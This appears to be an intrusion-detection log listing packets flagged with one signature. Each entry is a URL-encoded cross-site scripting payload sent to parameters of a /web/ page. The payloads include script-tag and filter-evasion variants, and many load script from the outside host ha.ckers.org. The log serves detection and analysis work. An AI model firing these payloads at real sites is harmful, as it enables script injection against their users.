Packet [652]	Uri [/web/?demo-priority=%3CSCRIPT%3Edocument.write%28%22%3CSCRI%22%29%3B%3C%2FSCRIPT%3EPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [653]	Uri [/web/?demo-priority=%3C%2FTITLE%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [654]	Uri [/web/?demo-priority=%3C%2FTITLE%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [655]	Uri [/web/?demo-priority=%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [656]	Uri [/web/?demo-priority=%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [659]	Uri [/web/?demo-priority=%3CSCRIPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.jpg%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [660]	Uri [/web/?demo-priority=%3CSCRIPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.jpg%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [681]	Uri [/web/?demo-priority=%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3CSCRIPT+SRC%27%22--%3E%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E%27%22--%3E]	Nattacks [1]	Signatures	[2009714]
Packet [682]	Uri [/web/?demo-priority=%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3CSCRIPT+SRC%27%22--%3E%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E%27%22--%3E]	Nattacks [1]	Signatures	[2009714]
Packet [687]	Uri [/web/?demo-priority=%3CSCRIPT+%22a%3D%27%3E%27%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [688]	Uri [/web/?demo-priority=%3CSCRIPT+%22a%3D%27%3E%27%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [697]	Uri [/web/?demo-priority=%3CSCRIPT+a%3D%60%3E%60+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [698]	Uri [/web/?demo-priority=%3CSCRIPT+a%3D%60%3E%60+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [699]	Uri [/web/?demo-priority=%3CSCRIPT+a%3D%22%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [700]	Uri [/web/?demo-priority=%3CSCRIPT+a%3D%22%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [701]	Uri [/web/?demo-priority=%3CSCRIPT+%3D%22blah%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [702]	Uri [/web/?demo-priority=%3CSCRIPT+%3D%22blah%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [703]	Uri [/web/?demo-priority=%3CSCRIPT+a%3D%22blah%22+%27%27+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [704]	Uri [/web/?demo-priority=%3CSCRIPT+a%3D%22blah%22+%27%27+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [709]	Uri [/web/?demo-priority=%3CSCRIPT+a%3D%22%3E%27%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [710]	Uri [/web/?demo-priority=%3CSCRIPT+a%3D%22%3E%27%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [715]	Uri [/web/?demo-priority=%3C%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%2F%2F%3C%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [716]	Uri [/web/?demo-priority=%3C%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%2F%2F%3C%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [727]	Uri [/web/?demo-priority=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E]	Nattacks [1]	Signatures	[2009714]
Packet [728]	Uri [/web/?demo-priority=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E]	Nattacks [1]	Signatures	[2009714]
Packet [735]	Uri [/web/?demo-priority=%3CSCRIPT%2FXSS+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [736]	Uri [/web/?demo-priority=%3CSCRIPT%2FXSS+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [745]	Uri [/web/?demo-priority=%3CSCRIPT%3Ea%3D%2FXSS%2F+alert%28a.source%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [746]	Uri [/web/?demo-priority=%3CSCRIPT%3Ea%3D%2FXSS%2F+alert%28a.source%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [761]	Uri [/web/?demo-priority=%3CMETA+HTTP-EQUIV%3D%22Set-Cookie%22+Content%3D%22USERID%3D%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E]	Nattacks [1]	Signatures	[2009714]
Packet [762]	Uri [/web/?demo-priority=%3CMETA+HTTP-EQUIV%3D%22Set-Cookie%22+Content%3D%22USERID%3D%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E]	Nattacks [1]	Signatures	[2009714]
Packet [765]	Uri [/web/?demo-priority=%3C%21--%5Bif+gte+IE+4%5D%3E+%3CSCRIPT%3Ealert%28%27XSS%27%29%3B%3C%2FSCRIPT%3E+%3C%21%5Bendif%5D--%3E]	Nattacks [1]	Signatures	[2009714]
Packet [766]	Uri [/web/?demo-priority=%3C%21--%5Bif+gte+IE+4%5D%3E+%3CSCRIPT%3Ealert%28%27XSS%27%29%3B%3C%2FSCRIPT%3E+%3C%21%5Bendif%5D--%3E]	Nattacks [1]	Signatures	[2009714]
Packet [775]	Uri [/web/?demo-priority=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [776]	Uri [/web/?demo-priority=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [783]	Uri [/web/?demo-priority=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [784]	Uri [/web/?demo-priority=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [845]	Uri [/web/?demo-human=%3C%3F+echo%28%27%3CSCR%29%27%3B+echo%28%27IPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%27%29%3B+%3F%3E]	Nattacks [1]	Signatures	[2009714]
Packet [846]	Uri [/web/?demo-human=%3C%3F+echo%28%27%3CSCR%29%27%3B+echo%28%27IPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%27%29%3B+%3F%3E]	Nattacks [1]	Signatures	[2009714]
Packet [851]	Uri [/web/?demo-human=%3CHTML%3E%3CBODY%3E+%3C%3Fxml%3Anamespace+prefix%3D%22t%22+ns%3D%22urn%3Aschemas-microsoft-com%3Atime%22%3E+%3C%3Fimport+namespace%3D%22t%22+implementation%3D%22%23default%23time2%22%3E+%3Ct%3Aset+attributeName%3D%22innerHTML%22+to%3D%22XSS%3CSCRIPT+DEFER%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E+%3C%2FBODY%3E%3C%2FHTML%3E]	Nattacks [1]	Signatures	[2009714]
Packet [852]	Uri [/web/?demo-human=%3CHTML%3E%3CBODY%3E+%3C%3Fxml%3Anamespace+prefix%3D%22t%22+ns%3D%22urn%3Aschemas-microsoft-com%3Atime%22%3E+%3C%3Fimport+namespace%3D%22t%22+implementation%3D%22%23default%23time2%22%3E+%3Ct%3Aset+attributeName%3D%22innerHTML%22+to%3D%22XSS%3CSCRIPT+DEFER%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E+%3C%2FBODY%3E%3C%2FHTML%3E]	Nattacks [1]	Signatures	[2009714]
Packet [869]	Uri [/web/?demo-human=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%7D]	Nattacks [1]	Signatures	[2009714]
Packet [870]	Uri [/web/?demo-human=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%7D]	Nattacks [1]	Signatures	[2009714]
Packet [871]	Uri [/web/?demo-human=%3CSCRIPT%3Edocument.write%28%22%3CSCRI%22%29%3B%3C%2FSCRIPT%3EPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [872]	Uri [/web/?demo-human=%3CSCRIPT%3Edocument.write%28%22%3CSCRI%22%29%3B%3C%2FSCRIPT%3EPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [873]	Uri [/web/?demo-human=%3C%2FTITLE%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [874]	Uri [/web/?demo-human=%3C%2FTITLE%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [875]	Uri [/web/?demo-human=%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [876]	Uri [/web/?demo-human=%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [879]	Uri [/web/?demo-human=%3CSCRIPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.jpg%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [880]	Uri [/web/?demo-human=%3CSCRIPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.jpg%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [901]	Uri [/web/?demo-human=%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3CSCRIPT+SRC%27%22--%3E%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E%27%22--%3E]	Nattacks [1]	Signatures	[2009714]
Packet [902]	Uri [/web/?demo-human=%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3CSCRIPT+SRC%27%22--%3E%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E%27%22--%3E]	Nattacks [1]	Signatures	[2009714]
Packet [907]	Uri [/web/?demo-human=%3CSCRIPT+%22a%3D%27%3E%27%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [908]	Uri [/web/?demo-human=%3CSCRIPT+%22a%3D%27%3E%27%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [917]	Uri [/web/?demo-human=%3CSCRIPT+a%3D%60%3E%60+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [918]	Uri [/web/?demo-human=%3CSCRIPT+a%3D%60%3E%60+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [919]	Uri [/web/?demo-human=%3CSCRIPT+a%3D%22%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [920]	Uri [/web/?demo-human=%3CSCRIPT+a%3D%22%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [921]	Uri [/web/?demo-human=%3CSCRIPT+%3D%22blah%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [922]	Uri [/web/?demo-human=%3CSCRIPT+%3D%22blah%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [923]	Uri [/web/?demo-human=%3CSCRIPT+a%3D%22blah%22+%27%27+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [924]	Uri [/web/?demo-human=%3CSCRIPT+a%3D%22blah%22+%27%27+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [929]	Uri [/web/?demo-human=%3CSCRIPT+a%3D%22%3E%27%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [930]	Uri [/web/?demo-human=%3CSCRIPT+a%3D%22%3E%27%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [935]	Uri [/web/?demo-human=%3C%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%2F%2F%3C%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [936]	Uri [/web/?demo-human=%3C%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%2F%2F%3C%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [947]	Uri [/web/?demo-human=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E]	Nattacks [1]	Signatures	[2009714]
Packet [948]	Uri [/web/?demo-human=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E]	Nattacks [1]	Signatures	[2009714]
Packet [955]	Uri [/web/?demo-human=%3CSCRIPT%2FXSS+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [956]	Uri [/web/?demo-human=%3CSCRIPT%2FXSS+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [965]	Uri [/web/?demo-human=%3CSCRIPT%3Ea%3D%2FXSS%2F+alert%28a.source%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [966]	Uri [/web/?demo-human=%3CSCRIPT%3Ea%3D%2FXSS%2F+alert%28a.source%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [981]	Uri [/web/?demo-human=%3CMETA+HTTP-EQUIV%3D%22Set-Cookie%22+Content%3D%22USERID%3D%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E]	Nattacks [1]	Signatures	[2009714]
Packet [982]	Uri [/web/?demo-human=%3CMETA+HTTP-EQUIV%3D%22Set-Cookie%22+Content%3D%22USERID%3D%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E]	Nattacks [1]	Signatures	[2009714]
Packet [985]	Uri [/web/?demo-human=%3C%21--%5Bif+gte+IE+4%5D%3E+%3CSCRIPT%3Ealert%28%27XSS%27%29%3B%3C%2FSCRIPT%3E+%3C%21%5Bendif%5D--%3E]	Nattacks [1]	Signatures	[2009714]
Packet [986]	Uri [/web/?demo-human=%3C%21--%5Bif+gte+IE+4%5D%3E+%3CSCRIPT%3Ealert%28%27XSS%27%29%3B%3C%2FSCRIPT%3E+%3C%21%5Bendif%5D--%3E]	Nattacks [1]	Signatures	[2009714]
Packet [995]	Uri [/web/?demo-human=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [996]	Uri [/web/?demo-human=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1003]	Uri [/web/?demo-human=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1004]	Uri [/web/?demo-human=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1065]	Uri [/web/?demo-name=%3C%3F+echo%28%27%3CSCR%29%27%3B+echo%28%27IPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%27%29%3B+%3F%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1066]	Uri [/web/?demo-name=%3C%3F+echo%28%27%3CSCR%29%27%3B+echo%28%27IPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%27%29%3B+%3F%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1071]	Uri [/web/?demo-name=%3CHTML%3E%3CBODY%3E+%3C%3Fxml%3Anamespace+prefix%3D%22t%22+ns%3D%22urn%3Aschemas-microsoft-com%3Atime%22%3E+%3C%3Fimport+namespace%3D%22t%22+implementation%3D%22%23default%23time2%22%3E+%3Ct%3Aset+attributeName%3D%22innerHTML%22+to%3D%22XSS%3CSCRIPT+DEFER%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E+%3C%2FBODY%3E%3C%2FHTML%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1072]	Uri [/web/?demo-name=%3CHTML%3E%3CBODY%3E+%3C%3Fxml%3Anamespace+prefix%3D%22t%22+ns%3D%22urn%3Aschemas-microsoft-com%3Atime%22%3E+%3C%3Fimport+namespace%3D%22t%22+implementation%3D%22%23default%23time2%22%3E+%3Ct%3Aset+attributeName%3D%22innerHTML%22+to%3D%22XSS%3CSCRIPT+DEFER%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E+%3C%2FBODY%3E%3C%2FHTML%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1089]	Uri [/web/?demo-name=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%7D]	Nattacks [1]	Signatures	[2009714]
Packet [1090]	Uri [/web/?demo-name=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%7D]	Nattacks [1]	Signatures	[2009714]
Packet [1091]	Uri [/web/?demo-name=%3CSCRIPT%3Edocument.write%28%22%3CSCRI%22%29%3B%3C%2FSCRIPT%3EPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1092]	Uri [/web/?demo-name=%3CSCRIPT%3Edocument.write%28%22%3CSCRI%22%29%3B%3C%2FSCRIPT%3EPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1093]	Uri [/web/?demo-name=%3C%2FTITLE%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1094]	Uri [/web/?demo-name=%3C%2FTITLE%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1095]	Uri [/web/?demo-name=%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1096]	Uri [/web/?demo-name=%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1099]	Uri [/web/?demo-name=%3CSCRIPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.jpg%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1100]	Uri [/web/?demo-name=%3CSCRIPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.jpg%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1121]	Uri [/web/?demo-name=%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3CSCRIPT+SRC%27%22--%3E%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E%27%22--%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1122]	Uri [/web/?demo-name=%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3CSCRIPT+SRC%27%22--%3E%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E%27%22--%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1127]	Uri [/web/?demo-name=%3CSCRIPT+%22a%3D%27%3E%27%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1128]	Uri [/web/?demo-name=%3CSCRIPT+%22a%3D%27%3E%27%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1137]	Uri [/web/?demo-name=%3CSCRIPT+a%3D%60%3E%60+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1138]	Uri [/web/?demo-name=%3CSCRIPT+a%3D%60%3E%60+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1139]	Uri [/web/?demo-name=%3CSCRIPT+a%3D%22%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1140]	Uri [/web/?demo-name=%3CSCRIPT+a%3D%22%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1141]	Uri [/web/?demo-name=%3CSCRIPT+%3D%22blah%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1142]	Uri [/web/?demo-name=%3CSCRIPT+%3D%22blah%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1143]	Uri [/web/?demo-name=%3CSCRIPT+a%3D%22blah%22+%27%27+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1144]	Uri [/web/?demo-name=%3CSCRIPT+a%3D%22blah%22+%27%27+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1149]	Uri [/web/?demo-name=%3CSCRIPT+a%3D%22%3E%27%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1150]	Uri [/web/?demo-name=%3CSCRIPT+a%3D%22%3E%27%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1155]	Uri [/web/?demo-name=%3C%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%2F%2F%3C%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1156]	Uri [/web/?demo-name=%3C%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%2F%2F%3C%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1167]	Uri [/web/?demo-name=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1168]	Uri [/web/?demo-name=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1175]	Uri [/web/?demo-name=%3CSCRIPT%2FXSS+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1176]	Uri [/web/?demo-name=%3CSCRIPT%2FXSS+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
